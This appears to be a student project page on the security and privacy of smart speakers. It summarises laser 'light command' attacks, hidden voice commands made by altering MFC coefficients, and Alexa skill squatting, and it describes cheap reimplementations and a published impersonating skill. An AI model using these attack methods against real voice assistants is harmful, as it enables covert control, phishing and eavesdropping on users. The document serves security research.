The Security and Privacy of Smart Speakers

Smart speaker, for example, Amazon Echo and Google Home, is a speaker with a voice-controlled intelligent virtual assistant that offers hands-free interactive actions. Unlike early voice-activatedtechnologies, which only work with a limited number of assigned commands, smart speakers are activated with a hot word and listen to a wide range of commands and questions after the hot word. This technology powered by natural language processing and machine learning provides excellent convenience to users daily lives, which contributes to the popularity of smart speakers; It is believed that 10% of the consumers around the world own a smart speaker. However, this great convenience also leads to a number of security and privacy issues. The most obvious concern is whether the smart speaker is always listening and recording user conversations, which can be maliciously used as a wiretap. This project aims to study the security and privacy issues associated with smart speakers, then provide a practical evaluation of existing attacks that can be done at a low cost.

Existing Attacks

Acoustic Attacks

Using inhouse bluetooth speaker to play recorded user instructions that controls the smart speaker
VSButton: uses the WiFi Technology to detect indoor human motions, only triggers the microphone when motion is detected, e.g. waving hands for 0.2m

Inaudible Attacks

Points a laser beam at the microphone which passes the recorded user instructions to the aser beam through a laser current driver
Physical blocks over microphone to block light beams, can be a half transparent plate or movable shutter

Skill Squatting Attacks

Register similar skills name to called the registered skill instead of the user targeted skill
Skill name must be unique, avoid similar names (e.g. only adding please before or after existing skill name)

Methodology

Target: Amazon Echo Dot

Affordable, popular, common

Attack 1: Light commands

Modify the light commands attack to use self built equipments to minimise the cost
Original cost: laser diode current driver (HKD 3000), headphone amplifier (HKD 200), laser diode (HKD 100)

Attack 2: Hidden voice commands

Generate obfuscated commands only recongisable by machines
Trail and error to modify MFC coefficients to maximise how obfuscated the command can be

Attack 3: Skill squatting attack

Create new skill similar to a legitimate one to hijack/impersonate voice commands
Utilise Alexa app card display to prove possibilty of more severe phishing attacks

Implementation

Attack 1: Light commands

Laser diode obtained from recycled PC DVD reader
Headphone amplifier and current driver can be built by own
Unstable for now (battery overheats that might cause fire, waiting for additional components to arrive)

Attack 2: Hidden voice commands

Original command generated by text to speech generator
Mangled command through audio mangler
Obfuscated command through MATLAB tool to modify MFC coefficients
Demo

Attack 3: Skill squatting attack

Simon Says (legitimate: "simon says", impersonate: "the simon says game")
Proved to be used by users unintentionally (published to Alexa skill store)
Demo: firstly the legitimate skill, then the impersonated skill (designed not functionable to be distinguished easily here)

To Do

To do completed in order

Oral examination

In Progress

Final Report

Introduction

Background

Existing Attacks

Methodology and Design

Implementation

Evaluation

Conclusion

Done

Completed as of 24 Jul

Literature review

Background information

Methodology

Implementation

Evaluation